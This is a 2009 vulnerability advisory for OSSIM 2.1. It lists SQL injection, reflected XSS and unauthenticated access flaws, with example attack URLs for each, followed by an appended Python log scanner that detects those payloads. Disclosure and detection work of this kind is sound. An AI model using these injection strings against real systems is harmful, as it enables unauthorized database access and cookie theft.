OSSIM version 2.1 remote SQL injection and cross site scripting

2009.09.25
Credit: DSecRG
Risk: Medium
Local: No
Remote: Yes

OSSIM (Open Source Security Information Management) is affected by multiple security vulnerabilities:

1. SQL injections
2. Linked XSS
3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055

Application: OSSIM
Versions Affected: 2.1, and possibly 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection, XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory: 21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details
*******

1.1 SQL injection in repository

The attacker needs to be authorized in the system to succeed.

Vulnerable script - repository_document.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1

1.2 SQL injection in repository

The attacker needs to be authorized in the system to succeed.

Vulnerable script - repository_links.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 union select 1,user(),3,4,5,6

1.3 SQL injection in repository

The attacker needs to be authorized in the system to succeed.

Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document

Example
*******

http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts

The attacker needs to be authorized in the system to succeed.

Vulnerable script - getpolicy.php
Vulnerable parameter - group

Example
*******

http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts

The attacker needs to be authorized in the system to succeed.

Vulnerable script - newhostgroupform.php
Vulnerable parameter - name

Example
*******

http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select user(),'b','c','d','f

1.6 SQL injection in policy scripts

The attacker needs to be authorized in the system to succeed.

Vulnerable script - modifynetform.php
Vulnerable parameter - name

Example
*******

http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select user(),'b','c','d','e','f','g','h','a

Other scripts in the policy menu are also affected.

2. Linked XSS in main menu

Vulnerable script - /ossim/
Vulnerable parameter - option

Example
*******

http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="

3. Access to data without authentication

An unauthenticated user can view graphs and the infrastructure.

Example
*******

Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php

Fix Information
***************

Upgrade to version 2.1.2

About
*****

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
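For sites that ran 2.1 before upgrading, the parameters named in sections 1 and 2 can be checked in web server access logs. The following is an added example, not part of the DSecRG advisory or of OSSIM: it flags requests to the listed scripts whose parameter values fail a simple allow-list. The allow-list patterns (numeric ids, plain names) and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-lists are assumptions: ids/options are digits, names are plain labels.
NUM = re.compile(r"\d+\Z")
NAME = re.compile(r"[\w .-]+\Z")

# Script path -> (parameter, allow-list), taken from the advisory's sections 1 and 2.
RULES = {
    "/ossim/repository/repository_document.php": ("id_document", NUM),
    "/ossim/repository/repository_links.php": ("id_document", NUM),
    "/ossim/repository/repository_editdocument.php": ("id_document", NUM),
    "/ossim/policy/getpolicy.php": ("group", NUM),
    "/ossim/host/newhostgroupform.php": ("name", NAME),
    "/ossim/net/modifynetform.php": ("name", NAME),
    "/ossim/": ("option", NUM),
}
# Greedy match so request targets logged with literal spaces are still captured.
REQUEST = re.compile(r'"(?:GET|POST) (.+) HTTP/\d')

# Constructed access-log lines (combined log format, documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2009:10:00:01 +0000] "GET /ossim/repository/repository_document.php?id_document=12&maximized=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Sep/2009:10:02:13 +0000] "GET /ossim/repository/repository_document.php?id_document=-3%20union%20select%201,2,user(),4,5,6--&maximized=1 HTTP/1.1" 200 4980',
    '192.0.2.44 - - [25/Sep/2009:10:02:40 +0000] "GET /ossim/policy/getpolicy.php?group=0%20and%201=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [25/Sep/2009:10:03:05 +0000] "GET /ossim/host/newhostgroupform.php?name=dmz-servers HTTP/1.1" 200 2210',
    '192.0.2.44 - - [25/Sep/2009:10:04:51 +0000] "GET /ossim/?option=0%22%20onload=alert(document.cookie)%20a=%22 HTTP/1.1" 200 9001',
]

def check_request(target):
    """Return (path, param, decoded value) for each value that fails its allow-list."""
    parts = urlsplit(target)
    rule = RULES.get(parts.path)
    if rule is None:
        return []
    param, pattern = rule
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    return [(parts.path, param, v) for v in values if v and not pattern.match(v)]

def scan_log(lines):
    """Collect findings for every request line in an access log."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            hits.extend(check_request(m.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The unauthenticated pages in section 3 and the other policy-menu scripts the advisory mentions without naming are outside what this check covers.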

References:

http://www.securityfocus.com/bid/36504
http://www.securityfocus.com/archive/1/archive/1/506663/100/0/threaded
http://secunia.com/advisories/36867
http://dsecrg.com/pages/vul/show.php?id=155

